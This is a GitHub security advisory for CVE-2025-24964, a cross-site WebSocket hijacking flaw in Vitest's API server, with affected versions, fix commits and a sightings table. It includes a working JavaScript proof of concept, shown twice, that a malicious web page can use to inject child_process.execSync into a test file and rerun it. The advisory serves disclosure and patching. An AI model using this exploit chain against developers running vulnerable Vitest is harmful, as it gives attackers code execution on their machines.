ghsa-9crc-q9x8-hgqq
Vulnerability from github
Summary
Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.
Details
When api
option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46
This WebSocket server has saveTestFile
API that can edit a test file and rerun
API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile
API and then running that file by calling the rerun
API.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76
PoC
- Open Vitest UI.
- Access a malicious web site with the script below.
- If you have
calc
executable inPATH
env var (you'll likely have it if you are running on Windows), that application will be executed.
```js // code from https://github.com/WebReflection/flatted const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});
// actual code to run const ws = new WebSocket('ws://localhost:51204/vitest_api') ws.addEventListener('message', e => { console.log(e.data) }) ws.addEventListener('open', () => { ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))
const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"
// edit file content to inject command execution
ws.send(Flatted.stringify({
t: 'q',
i: crypto.randomUUID(),
m: "saveTestFile",
a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
}))
// rerun the tests to run the injected command execution code
ws.send(Flatted.stringify({
t: 'q',
i: crypto.randomUUID(),
m: "rerun",
a: [testFilePath]
}))
}) ```
Impact
This vulnerability can result in remote code execution for users that are using Vitest serve API.
{ "affected": [ { "package": { "ecosystem": "npm", "name": "vitest" }, "ranges": [ { "events": [ { "introduced": "1.0.0" }, { "fixed": "1.6.1" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "npm", "name": "vitest" }, "ranges": [ { "events": [ { "introduced": "2.0.0" }, { "fixed": "2.1.9" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "npm", "name": "vitest" }, "ranges": [ { "events": [ { "introduced": "3.0.0" }, { "fixed": "3.0.5" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "npm", "name": "vitest" }, "ranges": [ { "events": [ { "introduced": "0" }, { "last_affected": "0.0.125" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2025-24964" ], "database_specific": { "cwe_ids": [ "CWE-1385" ], "github_reviewed": true, "github_reviewed_at": "2025-02-04T17:00:57Z", "nvd_published_at": "2025-02-04T20:15:50Z", "severity": "CRITICAL" }, "details": "### Summary\nArbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.\n\n### Details\nWhen [`api` option](https://vitest.dev/config/#api) is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.\nhttps://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46\n\nThis WebSocket server has `saveTestFile` API that can edit a test file and `rerun` API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the `saveTestFile` API and then running that file by calling the `rerun` API.\nhttps://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76\n\n### PoC\n1. Open Vitest UI.\n2. Access a malicious web site with the script below.\n3. If you have `calc` executable in `PATH` env var (you\u0027ll likely have it if you are running on Windows), that application will be executed.\n\n```js\n// code from https://github.com/WebReflection/flatted\nconst Flatted=function(n){\"use strict\";function t(n){return t=\"function\"==typeof Symbol\u0026\u0026\"symbol\"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n\u0026\u0026\"function\"==typeof Symbol\u0026\u0026n.constructor===Symbol\u0026\u0026n!==Symbol.prototype?\"symbol\":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f=\"string\",i={},c=\"object\",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p\u003cy;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i\u0026\u0026(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g\u003cm;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c\u0026\u0026u?y(o,new Set,u,f):u;return f.call({\"\":i},\"\",i)},S=function(n,r,o){for(var u=r\u0026\u0026t(r)===c?function(n,t){return\"\"===n||-1\u003cr.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({\"\":n},\"\",n)),v=!y;y\u003cl.length;)v=!0,s[y]=e(l[y++],S,o);return\"[\"+s.join(\",\")+\"]\";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});\n\n// actual code to run\nconst ws = new WebSocket(\u0027ws://localhost:51204/__vitest_api__\u0027)\nws.addEventListener(\u0027message\u0027, e =\u003e {\n console.log(e.data)\n})\nws.addEventListener(\u0027open\u0027, () =\u003e {\n ws.send(Flatted.stringify({ t: \u0027q\u0027, i: crypto.randomUUID(), m: \"getFiles\", a: [] }))\n\n const testFilePath = \"/path/to/test-file/basic.test.ts\" // use a test file returned from the response of \"getFiles\"\n\n // edit file content to inject command execution\n ws.send(Flatted.stringify({\n t: \u0027q\u0027,\n i: crypto.randomUUID(),\n m: \"saveTestFile\",\n a: [testFilePath, \"import child_process from \u0027child_process\u0027;child_process.execSync(\u0027calc\u0027)\"]\n }))\n // rerun the tests to run the injected command execution code\n ws.send(Flatted.stringify({\n t: \u0027q\u0027,\n i: crypto.randomUUID(),\n m: \"rerun\",\n a: [testFilePath]\n }))\n})\n```\n\n### Impact\nThis vulnerability can result in remote code execution for users that are using Vitest serve API.", "id": "GHSA-9crc-q9x8-hgqq", "modified": "2025-02-04T22:04:09Z", "published": "2025-02-04T17:00:57Z", "references": [ { "type": "WEB", "url": "https://github.com/vitest-dev/vitest/security/advisories/GHSA-9crc-q9x8-hgqq" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24964" }, { "type": "WEB", "url": "https://github.com/vitest-dev/vitest/commit/191ef9e34c867d0efd04f49b3d38193a68e825dc" }, { "type": "WEB", "url": "https://github.com/vitest-dev/vitest/commit/7ce9fbb4972d45c6fd34c843645ef6f549bbb241" }, { "type": "WEB", "url": "https://github.com/vitest-dev/vitest/commit/e0fe1d81e2d4bcddb1c6ca3c5c3970d8ba697383" }, { "type": "PACKAGE", "url": "https://github.com/vitest-dev/vitest" }, { "type": "WEB", "url": "https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46" }, { "type": "WEB", "url": "https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76" }, { "type": "WEB", "url": "https://vitest.dev/config/#api" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "type": "CVSS_V3" } ], "summary": "Vitest allows Remote Code Execution when accessing a malicious website while Vitest API server is listening" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.